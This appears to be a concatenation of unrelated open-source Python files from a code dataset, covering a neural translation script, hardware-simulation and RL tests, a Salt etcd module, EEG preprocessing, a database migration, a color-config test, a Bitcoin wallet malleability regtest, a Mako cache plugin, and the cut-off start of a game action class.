#if zxcv > 0.9: asdf='#'
#elif zxcv > 0.7: asdf='*'
#elif zxcv > 0.3: asdf='+'
#elif zxcv > 0.1: asdf='.'
#else: asdf=' '
#print(asdf * len(src_batch[0][n]), end=' ')
# generate next word
c, s_p = lstm(c, m.w_yp(s_y) + m.w_pp(s_p) + m.w_cp(s_c) + m.w_dp(s_d))
r_y = m.w_py(s_p)
output = wrapper.get_data(r_y).argmax(1)
for k in range(batch_size):
hyp_batch[k].append(trg_itos(output[k]))
#print(hyp_batch[0][-1])
if is_training:
s_t = wrapper.make_var([trg_stoi(trg_batch[k][l + 1]) for k in range(batch_size)], dtype=np.int32)
accum_loss += functions.softmax_cross_entropy(r_y, s_t)
s_y = s_t
else:
if all(hyp_batch[k][-1] == '</s>' for k in range(batch_size)): break
s_y = wrapper.make_var(output, dtype=np.int32)
return hyp_batch, accum_loss
def train(self, src_batch, trg_batch):
self.__opt.zero_grads()
hyp_batch, accum_loss = self.__forward(True, src_batch, trg_batch=trg_batch)
#g = cg.build_computational_graph([accum_loss])
#with open('asdf', 'w') as fp: fp.write(g.dump())
#sys.exit()
accum_loss.backward()
self.__opt.clip_grads(10)
self.__opt.update()
return hyp_batch
def predict(self, src_batch, generation_limit):
return self.__forward(False, src_batch, generation_limit=generation_limit)[0]
def parse_args():
def_vocab = 32768
def_embed = 256
def_hidden = 512
def_epoch = 100
def_minibatch = 64
def_generation_limit = 256
p = ArgumentParser(description='Attentional neural machine translation')
p.add_argument('mode', help='\'train\' or \'test\'')
p.add_argument('source', help='[in] source corpus')
p.add_argument('target', help='[in/out] target corpus')
p.add_argument('model', help='[in/out] model file')
p.add_argument('--vocab', default=def_vocab, metavar='INT', type=int,
help='vocabulary size (default: %d)' % def_vocab)
p.add_argument('--embed', default=def_embed, metavar='INT', type=int,
help='embedding layer size (default: %d)' % def_embed)
p.add_argument('--hidden', default=def_hidden, metavar='INT', type=int,
help='hidden layer size (default: %d)' % def_hidden)
p.add_argument('--epoch', default=def_epoch, metavar='INT', type=int,
help='number of training epoch (default: %d)' % def_epoch)
p.add_argument('--minibatch', default=def_minibatch, metavar='INT', type=int,
help='minibatch size (default: %d)' % def_minibatch)
p.add_argument('--generation-limit', default=def_generation_limit, metavar='INT', type=int,
help='maximum number of words to be generated for test input')
args = p.parse_args()
# check args
try:
if args.mode not in ['train', 'test']: raise ValueError('you must set mode = \'train\' or \'test\'')
if args.vocab < 1: raise ValueError('you must set --vocab >= 1')
if args.embed < 1: raise ValueError('you must set --embed >= 1')
if args.hidden < 1: raise ValueError('you must set --hidden >= 1')
if args.epoch < 1: raise ValueError('you must set --epoch >= 1')
if args.minibatch < 1: raise ValueError('you must set --minibatch >= 1')
if args.generation_limit < 1: raise ValueError('you must set --generation-limit >= 1')
except Exception as ex:
p.print_usage(file=sys.stderr)
print(ex, file=sys.stderr)
sys.exit()
return args
def train_model(args):
trace('making vocabularies ...')
src_vocab = Vocabulary.new(gens.word_list(args.source), args.vocab)
trg_vocab = Vocabulary.new(gens.word_list(args.target), args.vocab)
trace('making model ...')
model = AttentionalTranslationModel.new(src_vocab, trg_vocab, args.embed, args.hidden)
for epoch in range(args.epoch):
trace('epoch %d/%d: ' % (epoch + 1, args.epoch))
trained = 0
gen1 = gens.word_list(args.source)
gen2 = gens.word_list(args.target)
gen3 = gens.batch(gens.sorted_parallel(gen1, gen2, 100 * args.minibatch, order=0), args.minibatch)
model.init_optimizer()
for src_batch, trg_batch in gen3:
src_batch = fill_batch2(src_batch)
trg_batch = fill_batch2(trg_batch)
K = len(src_batch)
hyp_batch = model.train(src_batch, trg_batch)
for k in range(K):
trace('epoch %3d/%3d, sample %8d' % (epoch + 1, args.epoch, trained + k + 1))
trace(' src = ' + ' '.join([x if x != '</s>' else '*' for x in src_batch[k]]))
trace(' trg = ' + ' '.join([x if x != '</s>' else '*' for x in trg_batch[k]]))
trace(' hyp = ' + ' '.join([x if x != '</s>' else '*' for x in hyp_batch[k]]))
trained += K
trace('saving model ...')
model.save(args.model + '.%03d' % (epoch + 1))
trace('finished.')
def test_model(args):
trace('loading model ...')
model = AttentionalTranslationModel.load(args.model)
trace('generating translation ...')
generated = 0
with open(args.target, 'w') as fp:
for src_batch in gens.batch(gens.word_list(args.source), args.minibatch):
src_batch = fill_batch2(src_batch)
K = len(src_batch)
trace('sample %8d - %8d ...' % (generated + 1, generated + K))
hyp_batch = model.predict(src_batch, args.generation_limit)
for hyp in hyp_batch:
hyp.append('</s>')
hyp = hyp[:hyp.index('</s>')]
print(' '.join(hyp), file=fp)
generated += K
trace('finished.')
def main():
args = parse_args()
trace('initializing ...')
wrapper.init()
if args.mode == 'train': train_model(args)
elif args.mode == 'test': test_model(args)
if __name__ == '__main__':
main()
|
py | b415c336751b5309f2391c10178235e7701d0d99 | # Copyright cocotb contributors
# Licensed under the Revised BSD License, see LICENSE for details.
# SPDX-License-Identifier: BSD-3-Clause
import cocotb
async def whoops_async_generator():
# the user should have used `await` here, but they wrote `yield` by accident.
yield cocotb.triggers.Timer(1)
@cocotb.test() # testing async generator in legacy coroutine syntax
def test_yielding_accidental_async_generator(dut):
# this test deliberately does not use `async def`, as we are testing the behavior of `yield`
try:
yield whoops_async_generator()
except TypeError as e:
assert "async generator" in str(e)
else:
assert False, "should have thrown"
@cocotb.test()
async def test_forking_accidental_async_generator(dut):
try:
cocotb.start_soon(whoops_async_generator())
except TypeError as e:
assert "async generator" in str(e)
else:
assert False, "should have thrown"
@cocotb.coroutine # testing cocotb.coroutine decorated async generator
async def whoops_async_generator_decorated():
yield cocotb.triggers.Timer(1)
@cocotb.test()
async def test_decorating_accidental_async_generator(dut):
try:
await whoops_async_generator_decorated()
except TypeError as e:
assert "async generator" in str(e)
else:
assert False, "should have thrown"
|
py | b415c35dd729351342ef710fa1563d534c2ef5a9 | # -*- coding: utf-8 -*-
'''
Execution module to work with etcd
:depends: - python-etcd
In order to use an etcd server, a profile should be created in the master
configuration file:
.. code-block:: yaml
my_etd_config:
etcd.host: 127.0.0.1
etcd.port: 4001
It is technically possible to configure etcd without using a profile, but this
is not consided to be a best practice, especially when multiple etcd servers or
clusters are available.
.. code-block:: yaml
etcd.host: 127.0.0.1
etcd.port: 4001
'''
# Import python libs
import logging
# Import third party libs
try:
import salt.utils.etcd_util
HAS_LIBS = True
except Exception:
HAS_LIBS = False
__virtualname__ = 'etcd'
# Set up logging
log = logging.getLogger(__name__)
# Define a function alias in order not to shadow built-in's
__func_alias__ = {
'get_': 'get',
'set_': 'set',
'rm_': 'rm',
'ls_': 'ls'
}
def __virtual__():
'''
Only return if python-etcd is installed
'''
return __virtualname__ if HAS_LIBS else False
def get_(key, recurse=False, profile=None):
'''
Get a value from etcd, by direct path
CLI Examples:
salt myminion etcd.get /path/to/key
salt myminion etcd.get /path/to/key profile=my_etcd_config
salt myminion etcd.get /path/to/key recurse=True profile=my_etcd_config
'''
client = salt.utils.etcd_util.get_conn(__opts__, profile)
result = client.get(key)
if recurse:
return salt.utils.etcd_util.tree(client, key)
else:
return result.value
def set_(key, value, profile=None):
'''
Set a value in etcd, by direct path
CLI Example:
salt myminion etcd.set /path/to/key value
salt myminion etcd.set /path/to/key value profile=my_etcd_config
'''
client = salt.utils.etcd_util.get_conn(__opts__, profile)
return client.write(key, value)
def ls_(path='/', profile=None):
'''
Return all keys and dirs inside a specific path
CLI Example:
salt myminion etcd.ls /path/to/dir/
salt myminion etcd.ls /path/to/dir/ profile=my_etcd_config
'''
ret = {}
client = salt.utils.etcd_util.get_conn(__opts__, profile)
items = client.get(path)
for item in items.children:
if item.dir is True:
dir_name = '{0}/'.format(item.key)
ret[dir_name] = {}
else:
ret[item.key] = item.value
return {path: ret}
def rm_(key, recurse=False, profile=None):
'''
Delete a key from etcd
CLI Example:
salt myminion etcd.rm /path/to/key
salt myminion etcd.rm /path/to/key profile=my_etcd_config
salt myminion etcd.rm /path/to/dir recurse=True profile=my_etcd_config
'''
client = salt.utils.etcd_util.get_conn(__opts__, profile)
return client.delete(key, recursive=recurse)
def tree(path='/', profile=None):
'''
Recurse through etcd and return all values
CLI Example:
salt myminion etcd.tree
salt myminion etcd.tree profile=my_etcd_config
salt myminion etcd.tree /path/to/keys profile=my_etcd_config
'''
client = salt.utils.etcd_util.get_conn(__opts__, profile)
return salt.utils.etcd_util.tree(client, path)
|
py | b415c4bcd597a8713531a02226229631a3ce22d5 | from scipy import signal
import numpy as np
def transform(data, fs, num_rowscols, num_repeat, seconds_to_slice):
""" Given data imported from .mat, return the data in a format which is easy to use.
Args:
data (dict): The dictionary of importing .mat file.
fs (float): The sampling frequency.
num_rowscols (int): The sum of the numbers of rows and columns.
num_repeat (int): The number of times each character repeats.
seconds_to_slice (int): The number of seconds you want to slice as your data point after an intensify happens.
Return:
dict:
if is_training:
{
'signal': [num_characters, num_times, num_intens, num_electrodes, points_per_intens]
'code': [num_characters, num_times, num_intens], meaning as 'StimulusCode'
'label': [num_characters, num_times, num_intens], meaning as 'StimulusType'
'targetchar': [num_characters, ], meaning as 'TargetChar'. But we won't be using this to do training.
}
else:
{
'signal'
'code'
}
"""
# data = _read_BCIIII_p300_mat(path)
# if true then it's training set else test set
if 'StimulusType' in data.keys():
is_training = True
else:
is_training = False
# Training: Signal, StimulusCode, StimulusType, TargetChar, Flashing
# Test: Signal, StimulusCode, Flashing
num_characters = data['Signal'].shape[0]
num_electrodes = data['Signal'].shape[2]
points_per_intens = int(fs * seconds_to_slice)
# The shape of return I want
signal = np.zeros([num_characters, num_repeat, num_rowscols, num_electrodes, points_per_intens])
code = np.zeros([num_characters, num_repeat, num_rowscols])
if is_training: # if true then it's training set else test set
label = np.zeros([num_characters, num_repeat, num_rowscols])
for character in range(num_characters):
# All electrodes start at the same time so pick 0 is fine
timepoints = _find_timepoints_1D(data['StimulusCode'][character, :]) # (12*15,)
timepoints = timepoints.reshape([-1, num_rowscols]) # (15,12)
for time in range(num_repeat):
for intens in range(num_rowscols):
start = timepoints[time, intens]
end = start + points_per_intens
sliced_signal = data['Signal'][character, start:end, :] # (end-start,64)
sliced_signal = sliced_signal.transpose([1, 0]) # (64,end-start)
signal[character, time, intens, :, :] = sliced_signal
code[character, time, intens] = data['StimulusCode'][character, start]
if is_training:
label[character, time, intens] = data['StimulusType'][character, start]
if is_training:
return {'signal': signal, 'code': code, 'label': label, 'targetchar': np.array(list(data['TargetChar'][0]))}
else:
return {'signal': signal, 'code': code}
def _find_timepoints_1D(single_stimulus_code):
"""
Find the indexes where the value of single_stimulus_code turn from zero to non_zero
single_stimulus_code : 1-D array
>>> _find_timepoints_1D([5,5,0,0,4,4,4,0,0,1,0,2,0])
array([ 0, 4, 9, 11])
>>> _find_timepoints_1D([0,0,1,2,3,0,1,0,0])
array([2, 6])
>>> _find_timepoints_1D([0,0,1,2,0,1])
array([2, 5])
>>> _find_timepoints_1D([5,0,0,1,2,5])
array([0, 3])
"""
flag = True # whether have seen 0 so far
timepoints = []
for index, timepoint in enumerate(single_stimulus_code):
if timepoint != 0 and flag:
timepoints.append(index)
flag = False
if timepoint == 0 and not flag:
flag = True
return np.array(timepoints)
def subsample(data_array, subsample_interval):
""" Subsample every points_per_sample points """
return data_array[..., 0::subsample_interval]
def __butter_bandpass(lowcut, highcut, fs, order=5):
nyq = 0.5 * fs
low = lowcut / nyq
high = highcut / nyq
b, a = signal.butter(order, [low, high], btype='band')
return b, a
def butter_bandpass_filter(data, lowcut, highcut, fs, order=5, axis=-1):
b, a = __butter_bandpass(lowcut, highcut, fs, order=order)
y = signal.lfilter(b, a, data, axis=axis)
return y
def standardize_along(data, axis):
mean = data.mean(axis=axis, keepdims=True)
std = data.std(axis=axis,keepdims=True)
return (data - mean) / std |
py | b415c4faadf46c396a9b72eb2ed08f60e0ada92e | import unittest
import ray
from ray.rllib.agents.a3c import A2CTrainer
from ray.rllib.execution.common import STEPS_SAMPLED_COUNTER, \
STEPS_TRAINED_COUNTER
from ray.rllib.utils.test_utils import framework_iterator
class TestDistributedExecution(unittest.TestCase):
"""General tests for the distributed execution API."""
@classmethod
def setUpClass(cls):
ray.init(num_cpus=4)
@classmethod
def tearDownClass(cls):
ray.shutdown()
def test_exec_plan_stats(ray_start_regular):
for fw in framework_iterator(frameworks=("torch", "tf")):
trainer = A2CTrainer(
env="CartPole-v0",
config={
"min_iter_time_s": 0,
"framework": fw,
})
result = trainer.train()
assert isinstance(result, dict)
assert "info" in result
assert "learner" in result["info"]
assert STEPS_SAMPLED_COUNTER in result["info"]
assert STEPS_TRAINED_COUNTER in result["info"]
assert "timers" in result
assert "learn_time_ms" in result["timers"]
assert "learn_throughput" in result["timers"]
assert "sample_time_ms" in result["timers"]
assert "sample_throughput" in result["timers"]
assert "update_time_ms" in result["timers"]
def test_exec_plan_save_restore(ray_start_regular):
for fw in framework_iterator(frameworks=("torch", "tf")):
trainer = A2CTrainer(
env="CartPole-v0",
config={
"min_iter_time_s": 0,
"framework": fw,
})
res1 = trainer.train()
checkpoint = trainer.save()
for _ in range(2):
res2 = trainer.train()
assert res2["timesteps_total"] > res1["timesteps_total"], \
(res1, res2)
trainer.restore(checkpoint)
# Should restore the timesteps counter to the same as res2.
res3 = trainer.train()
assert res3["timesteps_total"] < res2["timesteps_total"], \
(res2, res3)
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__]))
|
py | b415c6304f230b9f55cff04b9b5816738409e544 | """Tag mode migration.
Revision ID: f972b83f1baa
Revises: 4c9a81798173
Create Date: 2019-04-04 12:38:40.310048
"""
from alembic import op
import sqlalchemy as sa
import os
import sys
from sqlalchemy.orm.session import Session
# Set system path, so alembic is capable of finding the stickerfinder module
parent_dir = os.path.abspath(os.path.join(os.getcwd()))
sys.path.append(parent_dir)
from stickerfinder.models import Chat # noqa
from stickerfinder.enum import TagMode # noqa
# revision identifiers, used by Alembic.
revision = "f972b83f1baa"
down_revision = "4c9a81798173"
branch_labels = None
depends_on = None
def upgrade():
op.add_column("chat", sa.Column("tag_mode", sa.String(), nullable=True))
session = Session(bind=op.get_bind())
# Set all changes to reviewed, where an task exists
session.query(Chat).filter(Chat.fix_single_sticker).update(
{"tag_mode": TagMode.single_sticker.value}
)
session.query(Chat).filter(Chat.tagging_random_sticker).update(
{"tag_mode": TagMode.random.value}
)
session.query(Chat).filter(Chat.full_sticker_set).update(
{"tag_mode": TagMode.sticker_set.value}
)
op.drop_index("ix_chat_current_sticker_set_name", table_name="chat")
op.drop_constraint("chat_current_sticker_set_name_fkey", "chat", type_="foreignkey")
op.drop_column("chat", "current_sticker_set_name")
op.drop_constraint("only_one_action_check", "chat")
def downgrade():
op.add_column(
"chat",
sa.Column(
"current_sticker_set_name", sa.VARCHAR(), autoincrement=False, nullable=True
),
)
op.create_foreign_key(
"chat_current_sticker_set_name_fkey",
"chat",
"sticker_set",
["current_sticker_set_name"],
["name"],
onupdate="CASCADE",
ondelete="SET NULL",
)
op.create_index(
"ix_chat_current_sticker_set_name",
"chat",
["current_sticker_set_name"],
unique=False,
)
op.drop_column("chat", "tag_mode")
op.create_check_constraint(
"only_one_action_check",
"chat",
"""
(tagging_random_sticker IS TRUE AND fix_single_sticker IS FALSE AND full_sticker_set IS FALSE) OR \
(fix_single_sticker IS TRUE AND tagging_random_sticker IS FALSE AND full_sticker_set IS FALSE) OR \
(full_sticker_set IS TRUE AND tagging_random_sticker IS FALSE AND fix_single_sticker IS FALSE) OR \
(full_sticker_set IS FALSE AND tagging_random_sticker IS FALSE AND fix_single_sticker IS FALSE)
""",
)
|
py | b415c6f9006f1ca4657c595dac7fd065ae23a5e8 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: AMPAS
# Copyright Academy of Motion Picture Arts and Sciences
"""
Defines unit tests for *ACES* configuration.
"""
from __future__ import division
import hashlib
import os
import re
import shutil
import sys
import tempfile
import unittest
sys.path.append(os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..')))
from aces_ocio.utilities import files_walker
from aces_ocio.generate_config import (
ACES_OCIO_CTL_DIRECTORY_ENVIRON,
generate_config)
__author__ = (
'Haarm-Pieter Duiker, Thomas Mansencal, Stephen Hill, Kevin Wheatley, '
'Joseph Goldstone')
__copyright__ = (
'Copyright (C) 2014-2021 Academy of Motion Picture Arts and Sciences')
__license__ = 'Academy of Motion Picture Arts and Sciences License Terms'
__maintainer__ = 'Academy of Motion Picture Arts and Sciences'
__email__ = '[email protected]'
__status__ = 'Production'
__all__ = ['REFERENCE_CONFIG_ROOT_DIRECTORY',
'HASH_TEST_PATTERNS',
'UNHASHABLE_TEST_PATTERNS',
'TestACESConfig']
# TODO: Investigate how the current config has been generated to use it for
# tests.
REFERENCE_CONFIG_ROOT_DIRECTORY = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..', '..'))
HASH_TEST_PATTERNS = ('\.3dl', '\.lut', '\.csp')
UNHASHABLE_TEST_PATTERNS = ('\.icc', '\.ocio')
class TestACESConfig(unittest.TestCase):
"""
Performs tests on the *ACES* configuration.
"""
def setUp(self):
"""
Initialises common tests attributes.
"""
self.__aces_ocio_ctl_directory = os.environ.get(
ACES_OCIO_CTL_DIRECTORY_ENVIRON, None)
assert self.__aces_ocio_ctl_directory is not None, (
'Undefined "%s" environment variable!' % (
ACES_OCIO_CTL_DIRECTORY_ENVIRON))
assert os.path.exists(self.__aces_ocio_ctl_directory) is True, (
'"%s" directory does not exists!' % (
self.__aces_ocio_ctl_directory))
self.maxDiff = None
self.__temporary_directory = tempfile.mkdtemp()
def tearDown(self):
"""
Post tests actions.
"""
shutil.rmtree(self.__temporary_directory)
@staticmethod
def directory_hashes(directory,
filters_in=None,
filters_out=None,
flags=0):
"""
Recursively computes the hashes from the file within given directory.
Parameters
----------
directory : str or unicode
Directory to compute the file hashes.
filters_in : array_like
Included patterns.
filters_out : array_like
Excluded patterns.
flags : int
Regex flags.
Returns
-------
dict
Directory file hashes.
"""
hashes = {}
for path in files_walker(directory,
filters_in=filters_in,
filters_out=filters_out,
flags=flags):
with open(path) as file:
digest = hashlib.md5(
re.sub('\s', '', file.read())).hexdigest()
hashes[path.replace(directory, '')] = digest
return hashes
def test_ACES_config(self):
"""
Performs tests on the *ACES* configuration by computing hashes on the
generated configuration and comparing them to the existing one.
"""
self.assertTrue(generate_config(self.__aces_ocio_ctl_directory,
self.__temporary_directory))
reference_hashes = self.directory_hashes(
REFERENCE_CONFIG_ROOT_DIRECTORY,
HASH_TEST_PATTERNS)
test_hashes = self.directory_hashes(
self.__temporary_directory,
HASH_TEST_PATTERNS)
self.assertDictEqual(reference_hashes, test_hashes)
# Checking that unashable files ('.icc', '.ocio') are generated.
unashable = lambda x: (
sorted([file.replace(x, '') for file in
files_walker(x, UNHASHABLE_TEST_PATTERNS)]))
self.assertListEqual(unashable(REFERENCE_CONFIG_ROOT_DIRECTORY),
unashable(self.__temporary_directory))
if __name__ == '__main__':
unittest.main()
|
py | b415c963a499e295bac292c9ce1e0d8d29c83f12 | #!/usr/bin/env python3
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Copyright (c) 2015-2017 The Bitcoin Unlimited developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import test_framework.loginit
#
# Test proper accounting with an equivalent malleability clone
#
from test_framework.test_framework import TriponeTestFramework
from test_framework.util import *
import pdb
import traceback
class TxnMallTest(TriponeTestFramework):
def add_options(self, parser):
parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
# Start with split network:
return super(TxnMallTest, self).setup_network(True)
def run_test(self):
# All nodes should start with 1,250 TONE:
starting_balance = 1250
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
# Assign coins to foo and bar accounts:
self.nodes[0].settxfee(.001)
node0_address_foo = self.nodes[0].getnewaddress("foo")
fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress("bar")
fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(""),
starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress("from0")
# Send tx1, and another transaction tx2 that won't be cloned
txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
# Construct a clone of tx1, to be malleated
rawtx1 = self.nodes[0].getrawtransaction(txid1,1)
clone_inputs = [{"txid":rawtx1["vin"][0]["txid"],"vout":rawtx1["vin"][0]["vout"]}]
clone_outputs = {rawtx1["vout"][0]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][0]["value"],
rawtx1["vout"][1]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][1]["value"]}
clone_raw = self.nodes[0].createrawtransaction(clone_inputs, clone_outputs)
# 3 hex manipulations on the clone are required
# manipulation 1. sequence is at version+#inputs+input+sigstub
posseq = 2*(4+1+36+1)
seqbe = '%08x' % rawtx1["vin"][0]["sequence"]
clone_raw = clone_raw[:posseq] + seqbe[6:8] + seqbe[4:6] + seqbe[2:4] + seqbe[0:2] + clone_raw[posseq + 8:]
# manipulation 2. createrawtransaction randomizes the order of its outputs, so swap them if necessary.
# output 0 is at version+#inputs+input+sigstub+sequence+#outputs
# 40 TONE serialized is 00286bee00000000
pos0 = 2*(4+1+36+1+4+1)
hex40 = "00286bee00000000"
output_len = 16 + 2 + 2 * int("0x" + clone_raw[pos0 + 16 : pos0 + 16 + 2], 0)
if (rawtx1["vout"][0]["value"] == 40 and clone_raw[pos0 : pos0 + 16] != hex40 or
rawtx1["vout"][0]["value"] != 40 and clone_raw[pos0 : pos0 + 16] == hex40):
output0 = clone_raw[pos0 : pos0 + output_len]
output1 = clone_raw[pos0 + output_len : pos0 + 2 * output_len]
clone_raw = clone_raw[:pos0] + output1 + output0 + clone_raw[pos0 + 2 * output_len:]
# manipulation 3. locktime is after outputs
poslt = pos0 + 2 * output_len
ltbe = '%08x' % rawtx1["locktime"]
clone_raw = clone_raw[:poslt] + ltbe[6:8] + ltbe[4:6] + ltbe[2:4] + ltbe[0:2] + clone_raw[poslt + 8:]
# Use a different signature hash type to sign. This creates an equivalent but malleated clone.
# Don't send the clone anywhere yet
tx1_clone = self.nodes[0].signrawtransaction(clone_raw, None, None, "ALL|ANYONECANPAY")
assert_equal(tx1_clone["complete"], True)
# Have node0 mine a block, if requested:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50TONE for another
# matured block, minus tx1 and tx2 amounts, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block: expected += 50
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
# foo and bar accounts should be debited:
assert_equal(self.nodes[0].getbalance("foo", 0), 1219 + tx1["amount"] + tx1["fee"])
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's "from0" balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"] + tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Send clone and its parent to miner
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
txid1_clone = self.nodes[2].sendrawtransaction(tx1_clone["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
self.nodes[2].sendrawtransaction(tx2["hex"])
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx1_clone = self.nodes[0].gettransaction(txid1_clone)
tx2 = self.nodes[0].gettransaction(txid2)
# Verify expected confirmations
assert_equal(tx1["confirmations"], -2)
assert_equal(tx1_clone["confirmations"], 2)
assert_equal(tx2["confirmations"], 1)
# Check node0's total balance; should be same as before the clone, + 100 TONE for 2 matured,
# less possible orphaned matured subsidy
expected += 100
if (self.options.mine_block):
expected -= 50
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*", 0), expected)
# Check node0's individual account balances.
# "foo" should have been debited by the equivalent clone of tx1
assert_equal(self.nodes[0].getbalance("foo"), 1219 + tx1["amount"] + tx1["fee"])
# "bar" should have been debited by (possibly unconfirmed) tx2
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
# "" should have starting balance, less funding txes, plus subsidies
assert_equal(self.nodes[0].getbalance("", 0), starting_balance
- 1219
+ fund_foo_tx["fee"]
- 29
+ fund_bar_tx["fee"]
+ 100)
# Node1's "from0" account balance
assert_equal(self.nodes[1].getbalance("from0", 0), -(tx1["amount"] + tx2["amount"]))
if __name__ == '__main__':
TxnMallTest().main()
def Test():
t = TxnMallTest()
t.drop_to_pdb = True
triponeConf = {
"debug": ["net", "blk", "thin", "mempool", "req", "bench", "evict"], # "lck"
"blockprioritysize": 2000000 # we don't want any transactions rejected due to insufficient fees...
}
t.main(["--tmpdir=/ramdisk/test","--nocleanup","--noshutdown"], triponeConf, None) # , "--tracerpc"])
|
py | b415c9c3c7cfcd4f1438f857b93e05bd01a8ee66 | # ext/beaker_cache.py
# Copyright 2006-2019 the Mako authors and contributors <see AUTHORS file>
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Provide a :class:`.CacheImpl` for the Beaker caching system."""
from mako import exceptions
from mako.cache import CacheImpl
try:
from beaker import cache as beaker_cache
except:
has_beaker = False
else:
has_beaker = True
_beaker_cache = None
class BeakerCacheImpl(CacheImpl):
"""A :class:`.CacheImpl` provided for the Beaker caching system.
This plugin is used by default, based on the default
value of ``'beaker'`` for the ``cache_impl`` parameter of the
:class:`.Template` or :class:`.TemplateLookup` classes.
"""
def __init__(self, cache):
if not has_beaker:
raise exceptions.RuntimeException(
"Can't initialize Beaker plugin; Beaker is not installed."
)
global _beaker_cache
if _beaker_cache is None:
if "manager" in cache.template.cache_args:
_beaker_cache = cache.template.cache_args["manager"]
else:
_beaker_cache = beaker_cache.CacheManager()
super(BeakerCacheImpl, self).__init__(cache)
def _get_cache(self, **kw):
expiretime = kw.pop("timeout", None)
if "dir" in kw:
kw["data_dir"] = kw.pop("dir")
elif self.cache.template.module_directory:
kw["data_dir"] = self.cache.template.module_directory
if "manager" in kw:
kw.pop("manager")
if kw.get("type") == "memcached":
kw["type"] = "ext:memcached"
if "region" in kw:
region = kw.pop("region")
cache = _beaker_cache.get_cache_region(self.cache.id, region, **kw)
else:
cache = _beaker_cache.get_cache(self.cache.id, **kw)
cache_args = {"starttime": self.cache.starttime}
if expiretime:
cache_args["expiretime"] = expiretime
return cache, cache_args
def get_or_create(self, key, creation_function, **kw):
cache, kw = self._get_cache(**kw)
return cache.get(key, createfunc=creation_function, **kw)
def put(self, key, value, **kw):
cache, kw = self._get_cache(**kw)
cache.put(key, value, **kw)
def get(self, key, **kw):
cache, kw = self._get_cache(**kw)
return cache.get(key, **kw)
def invalidate(self, key, **kw):
cache, kw = self._get_cache(**kw)
cache.remove_value(key, **kw)
|
py | b415ca44047ba452abe2b0c30c33eeda738b5b61 | # coding: utf-8
import dataclasses
import random
import typing
import serpyco
from guilang.description import Description
from guilang.description import Part
from guilang.description import Type
from rolling.action.base import CharacterAction
from rolling.action.base import get_character_action_url
from rolling.action.utils import check_common_is_possible
from rolling.action.utils import fill_base_action_properties
from rolling.exception import ImpossibleAction
from rolling.exception import RollingError
from rolling.rolling_types import ActionType
from rolling.server.link import CharacterActionLink
from rolling.util import quantity_to_str
if typing.TYPE_CHECKING:
from rolling.model.character import CharacterModel
from rolling.game.base import GameConfig
@dataclasses.dataclass
class SearchMaterialModel:
ap: typing.Optional[float] = serpyco.number_field(cast_on_load=True, default=None)
class SearchMaterialAction(CharacterAction):
input_model = SearchMaterialModel
input_model_serializer = serpyco.Serializer(SearchMaterialModel)
@classmethod
def get_properties_from_config(cls, game_config: "GameConfig", action_config_raw: dict) -> dict:
properties = fill_base_action_properties(cls, game_config, {}, action_config_raw)
for produce in action_config_raw["produce"]:
if "resource" not in produce and "stuff" not in produce:
raise RollingError(
"Misconfiguration for action SearchMaterialAction (produce "
f"must contain stuff or resource key ({action_config_raw})"
)
if "quantity_per_hour" not in produce or "random_loss" not in produce:
raise RollingError(
"Misconfiguration for action SearchMaterialAction (produce "
f"must contain quantity_per_hour or random_loss key ({action_config_raw})"
)
properties.update({"produce": action_config_raw["produce"]})
return properties
def check_is_possible(self, character: "CharacterModel") -> None:
check_common_is_possible(self._kernel, character=character, description=self._description)
def check_request_is_possible(
self, character: "CharacterModel", input_: SearchMaterialModel
) -> None:
self.check_is_possible(character)
if input_.ap and character.action_points < input_.ap:
raise ImpossibleAction(f"{character.name} ne poss_de pas assez de points d'actions")
def get_character_actions(
self, character: "CharacterModel"
) -> typing.List[CharacterActionLink]:
return [
CharacterActionLink(
name=self._description.name,
link=get_character_action_url(
character_id=character.id,
